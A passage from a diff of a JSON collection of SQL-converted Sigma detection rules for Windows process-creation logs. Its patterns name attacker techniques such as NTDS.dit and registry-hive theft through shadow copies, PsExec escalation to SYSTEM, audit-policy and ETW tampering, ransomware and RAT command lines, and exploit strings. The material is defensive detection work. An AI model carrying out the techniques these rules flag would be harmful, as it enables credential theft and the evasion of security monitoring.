CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", - "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1204" ], "falsepositives": [ - "Unlikely" + "Unknown", + "UAC bypass method used by other malware" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_malware_darkside_ransomware.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", + "status": "experimental", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - 